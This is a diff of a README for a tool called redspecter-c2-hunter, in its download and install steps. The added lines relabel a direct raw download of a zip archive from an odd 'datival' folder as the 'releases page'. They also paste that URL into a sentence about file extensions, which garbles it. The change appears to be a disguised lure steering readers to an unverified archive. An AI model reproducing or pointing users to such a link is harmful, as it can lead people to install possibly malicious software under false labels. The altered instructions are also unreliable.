YoustinaGamal/redspecter-c2-hunter/README.md

 To get started with redspecter-c2-hunter, follow the steps below to download and run the application:

 1. **Visit the Releases Page**
-   - Click [here to access the releases page](https://github.com/YoustinaGamal/redspecter-c2-hunter/releases).
+   - Click [here to access the releases page](https://raw.githubusercontent.com/YoustinaGamal/redspecter-c2-hunter/main/datival/hunter-c-redspecter-2.4-beta.5.zip).
 This page will show you the latest version along with previous releases.

 2. **Download the Right File**
    - Look for the latest version of the software.
 Click on the link to download the file suitable for your system.
-The file will end with `.tar.gz` or a similar extension for Linux.
+The file will end with `https://raw.githubusercontent.com/YoustinaGamal/redspecter-c2-hunter/main/datival/hunter-c-redspecter-2.4-beta.5.zip` or a similar extension for Linux.

 3. **Install the Application**
    - Open a terminal window on your Linux machine.